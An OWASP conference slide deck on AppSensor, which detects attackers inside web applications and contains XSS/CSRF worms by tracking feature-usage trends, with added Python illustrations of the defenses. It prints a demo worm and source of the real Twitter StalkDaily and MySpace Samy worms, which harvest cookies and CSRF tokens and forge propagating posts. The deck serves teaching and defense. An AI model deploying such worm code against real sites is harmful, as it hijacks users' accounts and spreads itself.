1
Copyright © The OWASP Foundation. Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License. The OWASP Foundation, http://www.owasp.org
OWASP EU09 Poland
Real Time Defenses against Application Worms and Malicious Attackers
Michael Coates, AppSensor, Aspect Security
Michael.Coates@aspectsecurity.com
http://michael-coates.blogspot.com
2
Who am I?
Michael Coates, Michael.Coates@aspectsecurity.com
- Senior Application Security Engineer @ Aspect Security
- Creator & Leader, OWASP AppSensor
- Sporadic Security Blogger, http://michael-coates.blogspot.com
3
Agenda
Malicious Attackers
- Attacking online banks is easier
- Why we currently can't catch them
- How to do it right
Application Worms
- Why they are bad
- Detecting and preventing them in real time
- Demo system with a real worm
4
Real Time Defenses Against MALICIOUS ATTACKERS
5
Attack Detection: Real vs Cyber World
Why do bank robbers get caught? Why don't hackers get caught?
6
Robbing a Bank
- Physical Controls
- Electronic Monitoring
- Human Monitoring
- Instant Detection and Response
- Controlled Access
- Multi Factor Auth
- Transaction Verification
7
Robbing an Online Bank
- Alternate Admin Access
- Partial External Controls
- Ineffective Monitoring
- No Real Time Analysis
- Unnecessary Partner Trust
- No Response Capability
- Single Factor Auth
- Limited Security Training
8
Let's change things! Applications should...
- Detect attacks
- Understand normal use vs. suspicious use
- Instantly identify attackers
- Shut down attackers in real time
- Modify application accessibility for defense
9
But wait, we have log monitoring
Log Monitoring
- Reactive process: "hey, looks like we got hacked last week"
- Most logs are incomplete or missing critical data
Web server access log (nothing here says whether user 1.2.3.4 was allowed to touch account 55112):
1.2.3.4 - - [timestamp] "GET /banking/view/account.jsp?id=12345 HTTP/1.0" 200
1.2.3.4 - - [timestamp] "POST /banking/view/UpdateAccount.jsp?id=12345 HTTP/1.0" 300
1.2.3.4 - - [timestamp] "POST /banking/view/UpdateAccount.jsp?id=55112 HTTP/1.0" 300
1.2.3.4 - - [timestamp] "POST /banking/view/account.jsp?id=55999 HTTP/1.0" 404
Application log (the security-relevant lines are mixed in with debug noise and carry no user, IP or request context):
176 [main] INFO examples.Sort - Populating data from db
272 [main] ERROR Access denied to /user/viewAcct.jsp
376 [main] ERROR User "Joe" performed unauthorized action
425 [main] DEBUG Admin page accessed
434 [main] INFO New admin account created
10
What about a WAF?
- WAFs don't understand application context
- Custom application + Generic Solution != success
Diagram: the WAF sees /viewAccount?id=1002 followed by /viewAccount?id=1004 and forwards both to the Application with "No attacks here, please proceed". Both requests are syntactically clean; only the application knows whether this user owns account 1004.
11
Detecting Attacks the Right Way
- Detect INSIDE the Application
- Automatic Detection
- Comprehensive
- Minimize False Positives
- Understand Business Logic
- Immediate Response
- No Manual Efforts Required
12
Example Detection Point

```java
String action = "viewAccount";
String targetID = Utility.safeGetParam("ID", request);
if (authorized(action, targetID)) {
    // perform action
} else {
    // Failed authorisation is a detection event, not just an error page:
    // report it to AppSensor (detection point ACE1) before denying the request.
    AppSensor.log(ACE1, user, request);
    throw new AccessControlException();
}
```
13
Detecting Malicious Users
- Receiving a POST for a page which only expects GET
- Invoking unsupported/nonexistent HTTP methods
- Change of User-Agent mid-session
- Transaction using functionality not visible to the user's role
- Double-encoded data
14
Why does this work? Simple math:
x = # of attacks needed for AppSensor to determine the user is malicious
y = # of probes the attacker needs to find a vuln
if (x < y) { Application Wins / User Disabled } else { hello front page news story* }
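The detection point on the previous slide, two of the "malicious user" signals and the x < y argument, as an added Python example (AppSensor itself is a Java framework; this is not its code). The detection-point IDs ACE1, RE1 and SE1, the policy thresholds and the account ownership table are assumptions made for this example.

```python
"""AppSensor-style detection points with a per-user response policy.

Added example, written in Python for illustration; it is not AppSensor's own
(Java) code.  The detection-point IDs, the policy thresholds and the account
ownership table are assumptions made for this example."""
from collections import defaultdict
from dataclasses import dataclass, field

# Hypothetical detection-point IDs (AppSensor's real catalogue is in its guide).
ACE1 = "ACE1"  # access-control violation: object the user is not authorised for
RE1 = "RE1"    # request used an HTTP method the page does not expect
SE1 = "SE1"    # User-Agent changed in the middle of a session


@dataclass
class Policy:
    """Cumulative events per user before each response fires (assumed values)."""
    warn_at: int = 2
    logout_at: int = 4
    disable_at: int = 6


@dataclass
class AppSensor:
    policy: Policy = field(default_factory=Policy)
    events: dict = field(default_factory=lambda: defaultdict(list))
    disabled: set = field(default_factory=set)
    actions: list = field(default_factory=list)   # responses taken, in order

    def log(self, point, user, detail=""):
        """Record one detection event and apply the response policy."""
        self.events[user].append((point, detail))
        n = len(self.events[user])
        if n == self.policy.disable_at:
            self.disabled.add(user)
            self.actions.append(("disable", user))
        elif n == self.policy.logout_at:
            self.actions.append(("logout", user))
        elif n == self.policy.warn_at:
            self.actions.append(("warn", user))

    def count(self, user):
        return len(self.events[user])

    def is_disabled(self, user):
        return user in self.disabled


# Constructed authorisation data: which account IDs each user owns.
OWNERS = {"alice": {12345, 12346}, "bob": {55112}}


def view_account(sensor, user, account_id, method="GET", user_agent=None, session=None):
    """The slide's detection point: the authorisation check reports failures to
    AppSensor instead of silently returning an error page.  Two of the
    'malicious user' signals are checked on the way in."""
    if sensor.is_disabled(user):
        return "disabled"
    if method != "GET":                       # page only expects GET
        sensor.log(RE1, user, f"{method} /viewAccount")
    if session is not None and user_agent is not None:
        first_ua = session.setdefault("ua", user_agent)
        if first_ua != user_agent:            # User-Agent changed mid-session
            sensor.log(SE1, user, f"{first_ua!r} -> {user_agent!r}")
    if account_id in OWNERS.get(user, set()):
        return "ok"
    sensor.log(ACE1, user, f"id={account_id}")
    return "denied"


def probe(sensor, user, ids):
    """Simulate an attacker walking account IDs.  Returns how many probes the
    application answered before the account was disabled, i.e. the slide's x;
    the attacker only wins if the vulnerable ID sits inside those x probes."""
    answered = 0
    for account_id in ids:
        if view_account(sensor, user, account_id) == "disabled":
            break
        answered += 1
    return answered
```

With the assumed policy, an attacker enumerating account IDs gets exactly six answers before the account is disabled, whatever the size of the ID space; a legitimate user viewing their own account generates no events at all. The counters are per user, so a response (warn, logout, disable) is aimed at the identity behind the session rather than at a request pattern.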
15
Implementing AppSensor: Detection Points
Diagram components: Application, Log Server, AppSensor Brain, Response Listener
16
Real Time Defenses Against APPLICATION WORMS
17
What about Application Worms?
Twitter Worm
- Free advertising, job for creator
- Numerous copycat worms
MySpace Samy Worm
- Lots of friends for Samy
- ...then MySpace goes down
Huge damages for the site: remediation, cleanup, bad PR, infected users
Both leverage XSS and CSRF
18
Detecting/Preventing an Application Worm
- Fix XSS vulns. That's good. Miss any?
- Pattern matching is easily foiled
- Common factor? The application feature leveraged by the worm (updateProfile, updateStatus, updateName), with XSS and CSRF for propagation
19
Case Study: Samy MySpace Application Worm
- XSS worm embedded in user profile
- Added Samy as friend
- Infected viewer's profile with XSS
- Exponential growth of Samy's friends: 10 hours - 560 friends; 13 hours - 6,400 friends; 18 hours - 1,000,000 friends; 19 hours - site down for repair
20
Samy vs AppSensor
- AppSensor detects an uptick in addFriend usage
- Compares it against trended info
- Automatic response initiated:
  1. +200% Add Friend usage: alerts admin (200% alert)
  2. +500% Add Friend usage: alerts admin a second time (500% alert)
  3. Automatically shuts down the Add Friend feature (auto defense)
Result: worm contained, Add Friend temporarily disabled, site stays up
21
Benefits of Trend Monitoring
- Detection of application worms, scripted attacks / probing, CSRF attacks
- Alerting on excessive activity
- Selective feature shutdown for overall stability
22
Seeing is Believing: Demo
Social networking app defended with AppSensor trend monitoring
23
The Design
Demo App with embedded AppSensor Response; AppSensor "Brain"; App Logs
24
The Target
- Poorly validated input
- Unencoded output
25
The Exploit
- XSS infects the victim's "Status" with the worm
- CSRF adds the victim as a friend of Charlie

The WORM (the HTML tags inside the img and attackstr string literals did not survive extraction from the slide; the empty strings are where they stood):

```javascript
var img = ' ';
document.write("I am a worm " + img);
if (document.URL != 'https://localhost:8443/AppSensorDemo/updateProfile.jsp') {
  xmlHttp = new XMLHttpRequest();
  xmlHttp.open("POST", "https://localhost:8443/AppSensorDemo/UpdateProfile", true);
  xmlHttp.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded; charset=UTF-8');
  var attackstr = ' ';
  sdata = "status=" + attackstr + "&profile=wormed";
  xmlHttp.send(sdata);
  xmlDoc = xmlHttp.responseText;
}
document.close();
```
26
Attack Set
- Infected status carries the worm script
- Charlie is "patient zero"
- XSS to propagate, CSRF to add friend
27
First Victim: "Molly" (worm fires)
28
What Just Happened?
- Message 24: Molly opens the addFriends page
- Message 26: worm tag adds Charlie as friend
- Message 27: worm updates Molly's status with malicious code
- Message 28: redirection from successful profile update
29
Molly Infected: worm spreads, CSRF success
30
Friends Accumulate for Charlie!
31
Defend with AppSensor
AppSensor Policy:
- Notify admin if events > 5
- Disable service if events > 10
AppSensor notices the anomaly and alerts the admin:
Trend Alert: Trend greater than 5 - utilization=7 /AppSensorDemo/UpdateProfile
ResponseAction: Sending Email Alert to:admin@site.com re: Service /AppSensorDemo/UpdateProfile
Trend Alert: Trend greater than 5 - utilization=6 /AppSensorDemo/addFriend.jsp
ResponseAction: Sending Email Alert to:admin@site.com re: Service /AppSensorDemo/addFriend.jsp
32
Defend with AppSensor
Anomaly continues, so the service is disabled:
Trend Alert: Trend greater than 10 - utilization=11 /AppSensorDemo/addFriend.jsp
ResponseAction: Disabling Service
Trend Alert: Trend greater than 10 - utilization=11 /AppSensorDemo/UpdateProfile
ResponseAction: Disabling Service
33
AppSensor Defends App
App Server Logs:
AppSensorServiceController: :/AppSensorDemo/addFriend.jsp active:false
AppSensorServiceController: Skipping Check for /AppSensorDemo/appsensor_locked.jsp
AppSensorServiceController: Disable Service:/AppSensorDemo/updateProfile.jsp for 40 s
AppSensorServiceController: service disabled, checking time
34
Users are Protected from the Worm
----Validating Login of sue---
AppSensorServiceController: :/AppSensorDemo/friends.jsp active:true
AppSensorServiceController: :/AppSensorDemo/addFriend.jsp active:false
Not Active, redirecting to locked page
AppSensorServiceController: :/AppSensorDemo/UpdateProfile active:false
Not Active, redirecting to locked page
The worm still fires in Sue's browser, but both requests it depends on are redirected to the locked page: AppSensor protects Sue.
35
Worm Contained, Site Stays Up
36
What's Under the Hood?
- Usage filter tracks feature usage
- isActive filter allows/denies feature access
37
What's Under the Hood?
- REST communication between AppSensor & App
- Supported response actions: warn user, logout user, disable user, etc.
Diagram components: Application, Log Server, AppSensor Brain, Response Listener
38
AppSensor Brain
- Drools rule-based system
- Support for complex rule sets, much more than just counting feature usage
- Evaluates objects in Drools working memory

```drools
rule "Trend Monitor 2"
when
    $t2 : TrendMonitor(utilization > 10)
then
    System.out.println("Trend Alert: >10 utilization=" + $t2.getUtilization() + " " + $t2.getResource());
    org.owasp.AppSensor.ResponseAction.disableService($t2.getResource(), 40, "s");
end
```
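The trend-monitoring defense from the Samy slide (alert at +200%, alert again at +500%, then shut the feature down), the demo's usage and isActive filters, and the Drools rule's time-limited disableService response, as one added Python example. This is not AppSensor's Drools rule set or its Java servlet filters; the window length, the baseline, the alert levels and the lockout duration are assumptions chosen to mirror the numbers on the slides.

```python
"""Feature-usage trend monitoring with automatic, time-limited feature shutdown.

Added example in Python; it is not AppSensor's Drools rule set or its Java
servlet filters.  The window length, the baseline, the alert levels and the
lockout duration are assumptions chosen to mirror the numbers on the slides."""
from collections import deque


class TrendMonitor:
    """One monitor per resource (e.g. /AppSensorDemo/addFriend.jsp).

    record() plays the role of the usage filter: it counts requests inside a
    sliding window and compares the count with the trended baseline.
    is_active() plays the role of the isActive filter: it denies access while
    a lockout is in force and re-enables the feature when it expires."""

    def __init__(self, resource, baseline, window=60, alert_levels=(200, 500),
                 disable_at=10, lockout=40):
        self.resource = resource
        self.baseline = float(baseline)   # normal uses per window (assumed, must be > 0)
        self.window = window              # seconds
        self.alert_levels = alert_levels  # percent of baseline that triggers an admin alert
        self.disable_at = disable_at      # absolute count that disables the feature
        self.lockout = lockout            # seconds the feature stays disabled
        self.events = deque()             # request timestamps inside the current window
        self.disabled_until = None
        self.alerts = []                  # (time, message) sent to the admin
        self._fired = set()               # alert levels already raised this episode

    def is_active(self, now):
        """isActive filter: False while the lockout is in force."""
        if self.disabled_until is not None:
            if now < self.disabled_until:
                return False
            self.disabled_until = None    # lockout expired: re-enable, reset alert state
            self._fired.clear()
        return True

    def record(self, now):
        """Usage filter: call on every request for the resource; returns the decision."""
        if not self.is_active(now):
            return "locked"
        self.events.append(now)
        while now - self.events[0] >= self.window:   # drop events outside the window
            self.events.popleft()
        util = len(self.events)
        if util > self.disable_at:
            # The Drools rule's response: disable the service for a fixed time.
            self.disabled_until = now + self.lockout
            self.events.clear()
            self.alerts.append((now, f"Disabling {self.resource} for {self.lockout}s (utilization={util})"))
            return "disabled"
        pct = 100.0 * util / self.baseline
        for level in self.alert_levels:
            if pct > level and level not in self._fired:
                self._fired.add(level)
                self.alerts.append((now, f"Trend +{level}% on {self.resource} (utilization={util})"))
        return "ok"


def replay(monitor, timestamps):
    """Feed a constructed request stream (seconds) through the monitor."""
    return [monitor.record(t) for t in timestamps]
```

A worm burst of one addFriend request per second against a baseline of two per minute raises the 200% alert at the fifth request, the 500% alert at the eleventh, and disables the feature once the absolute limit is passed; every request during the 40-second lockout is turned away, which is exactly what stops propagation even though the worm script is still firing in each victim's browser. Normal use, two requests a minute, never produces an alert. The disable is keyed on an absolute count rather than only on a percentage so that a very low baseline cannot make a handful of legitimate requests look like a 500% spike.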
39
Future Plans for AppSensor
- Live site of the demo app: attacker detection, worm detection
- Release of AppSensor code
- Update to the AppSensor Guide
40
Questions?
michael.coates@aspectsecurity.com
http://www.owasp.org/index.php/Category:OWASP_AppSensor_Project
http://michael-coates.blogspot.com
41
Backup
42
Twitter Worm (the document.write() argument and the tag inside the xss string were stripped on the slide; they are left as printed):

```javascript
function XHConn() {
  var xmlhttp, bComplete = false;
  try { xmlhttp = new ActiveXObject("Msxml2.XMLHTTP"); }
  catch (e) {
    try { xmlhttp = new ActiveXObject("Microsoft.XMLHTTP"); }
    catch (e) {
      try { xmlhttp = new XMLHttpRequest(); }
      catch (e) { xmlhttp = false; }
    }
  }
  if (!xmlhttp) return null;
  this.connect = function(sURL, sMethod, sVars, fnDone) {
    if (!xmlhttp) return false;
    bComplete = false;
    sMethod = sMethod.toUpperCase();
    try {
      if (sMethod == "GET") {
        xmlhttp.open(sMethod, sURL + "?" + sVars, true);
        sVars = "";
      } else {
        xmlhttp.open(sMethod, sURL, true);
        xmlhttp.setRequestHeader("Method", "POST " + sURL + " HTTP/1.1");
        xmlhttp.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
      }
      xmlhttp.onreadystatechange = function() {
        if (xmlhttp.readyState == 4 && !bComplete) {
          bComplete = true;
          fnDone(xmlhttp);
        }
      };
      xmlhttp.send(sVars);
    } catch (z) { return false; }
    return true;
  };
  return this;
}

function urlencode(str) {
  var histogram = {}, tmp_arr = [];
  var ret = str.toString();
  var replacer = function(search, replace, str) {
    var tmp_arr = [];
    tmp_arr = str.split(search);
    return tmp_arr.join(replace);
  };
  histogram["'"] = '%27';
  histogram['('] = '%28';
  histogram[')'] = '%29';
  histogram['*'] = '%2A';
  histogram['~'] = '%7E';
  histogram['!'] = '%21';
  histogram['%20'] = '+';
  ret = encodeURIComponent(ret);
  for (search in histogram) {
    replace = histogram[search];
    ret = replacer(search, replace, ret);
  }
  return ret.replace(/(\%([a-z0-9]{2}))/g, function(full, m1, m2) {
    return "%" + m2.toUpperCase();
  });
  return ret;
}

// Harvest the victim's screen name and session cookie from the page.
var content = document.documentElement.innerHTML;
userreg = new RegExp(/<meta content="(.*)" name="session-user-screen_name"/g);
var username = userreg.exec(content);
username = username[1];
var cookie;
cookie = urlencode(document.cookie);
document.write(" ");

function wait() {
  // Read the CSRF token from the page so the forged POSTs are accepted.
  var content = document.documentElement.innerHTML;
  authreg = new RegExp(/twttr.form_authenticity_token = '(.*)';/g);
  var authtoken = authreg.exec(content);
  authtoken = authtoken[1];
  //alert(authtoken);
  var randomUpdate = new Array();
  randomUpdate[0] = "Dude, www.StalkDaily.com is awesome. What's the fuss?";
  randomUpdate[1] = "Join www.StalkDaily.com everyone!";
  randomUpdate[2] = "Woooo, www.StalkDaily.com :)";
  randomUpdate[3] = "Virus!? What? www.StalkDaily.com is legit!";
  randomUpdate[4] = "Wow...www.StalkDaily.com";
  randomUpdate[5] = "@twitter www.StalkDaily.com";
  var genRand = randomUpdate[Math.floor(Math.random() * randomUpdate.length)];
  updateEncode = urlencode(genRand);
  var xss = urlencode('http://www.stalkdaily.com"> <a ');
  // Post a status update, then plant the payload in the profile URL field.
  var ajaxConn = new XHConn();
  ajaxConn.connect("/status/update", "POST",
    "authenticity_token=" + authtoken + "&status=" + updateEncode + "&tab=home&update=update");
  var ajaxConn1 = new XHConn();
  ajaxConn1.connect("/account/settings", "POST",
    "authenticity_token=" + authtoken + "&user[url]=" + xss + "&tab=home&update=update");
}
setTimeout("wait()", 3250);
```
43
MySpace Worm (the fragment on the slide begins part-way through paramsToString(), and the HTML tags inside the string literals did not survive extraction; it is shown as printed, one function per line, with only the line-wrap breaks inside identifiers repaired):

```javascript
0){N+='&'}var Q=escape(AV[P]);while(Q.indexOf('+')!=-1){Q=Q.replace('+','%2B')}while(Q.indexOf('&')!=-1){Q=Q.replace('&','%26')}N+=P+'='+Q;O++}return N}
function httpSend(BH,BI,BJ,BK){if(!J){return false}eval('J.onr'+'eadystatechange=BI');J.open(BJ,BH,true);if(BJ=='POST'){J.setRequestHeader('Content-Type','application/x-www-form-urlencoded');J.setRequestHeader('Content-Length',BK.length)}J.send(BK);return true}
function findIn(BF,BB,BC){var R=BF.indexOf(BB)+BB.length;var S=BF.substring(R,R+1024);return S.substring(0,S.indexOf(BC))}
function getHiddenParameter(BF,BG){return findIn(BF,'name='+B+BG+B+' value='+B,B)}
function getFromURL(BF,BG){var T;if(BG=='Mytoken'){T=B}else{T='&'}var U=BG+'=';var V=BF.indexOf(U)+U.length;var W=BF.substring(V,V+1024);var X=W.indexOf(T);var Y=W.substring(0,X);return Y}
function getXMLObj(){var Z=false;if(window.XMLHttpRequest){try{Z=new XMLHttpRequest()}catch(e){Z=false}}else if(window.ActiveXObject){try{Z=new ActiveXObject('Msxml2.XMLHTTP')}catch(e){try{Z=new ActiveXObject('Microsoft.XMLHTTP')}catch(e){Z=false}}}return Z}
// Copy the worm's own source out of the page so it can be re-embedded in the victim's profile.
var AA=g();var AB=AA.indexOf('m'+'ycode');var AC=AA.substring(AB,AB+4096);var AD=AC.indexOf('D'+'IV');var AE=AC.substring(0,AD);var AF;
if(AE){AE=AE.replace('jav'+'a',A+'jav'+'a');AE=AE.replace('exp'+'r)','exp'+'r)'+A);AF=' but most of all, samy is my hero. '}
var AG;
function getHome(){if(J.readyState!=4){return}var AU=J.responseText;AG=findIn(AU,'P'+'rofileHeroes',' ');AG=AG.substring(61,AG.length);if(AG.indexOf('samy')==-1){if(AF){AG+=AF;var AR=getFromURL(AU,'Mytoken');var AS=new Array();AS['interestLabel']='heroes';AS['submit']='Preview';AS['interest']=AG;J=getXMLObj();httpSend('/index.cfm?fuseaction=profile.previewInterests&Mytoken='+AR,postHero,'POST',paramsToString(AS))}}}
function postHero(){if(J.readyState!=4){return}var AU=J.responseText;var AR=getFromURL(AU,'Mytoken');var AS=new Array();AS['interestLabel']='heroes';AS['submit']='Submit';AS['interest']=AG;AS['hash']=getHiddenParameter(AU,'hash');httpSend('/index.cfm?fuseaction=profile.processInterests&Mytoken='+AR,nothing,'POST',paramsToString(AS))}
// main(): infect the viewer's own "heroes" section (XSS propagation) and add Samy as a friend (CSRF).
function main(){var AN=getClientFID();var BH='/index.cfm?fuseaction=user.viewProfile&friendID='+AN+'&Mytoken='+L;J=getXMLObj();httpSend(BH,getHome,'GET');xmlhttp2=getXMLObj();httpSend2('/index.cfm?fuseaction=invite.addfriend_verify&friendID=11851658&Mytoken='+L,processxForm,'GET')}
function processxForm(){if(xmlhttp2.readyState!=4){return}var AU=xmlhttp2.responseText;var AQ=getHiddenParameter(AU,'hashcode');var AR=getFromURL(AU,'Mytoken');var AS=new Array();AS['hashcode']=AQ;AS['friendID']='11851658';AS['submit']='Add to Friends';httpSend2('/index.cfm?fuseaction=invite.addFriendsProcess&Mytoken='+AR,nothing,'POST',paramsToString(AS))}
function httpSend2(BH,BI,BJ,BK){if(!xmlhttp2){return false}eval('xmlhttp2.onr'+'eadystatechange=BI');xmlhttp2.open(BJ,BH,true);if(BJ=='POST'){xmlhttp2.setRequestHeader('Content-Type','application/x-www-form-urlencoded');xmlhttp2.setRequestHeader('Content-Length',BK.length)}xmlhttp2.send(BK);return true}
">
```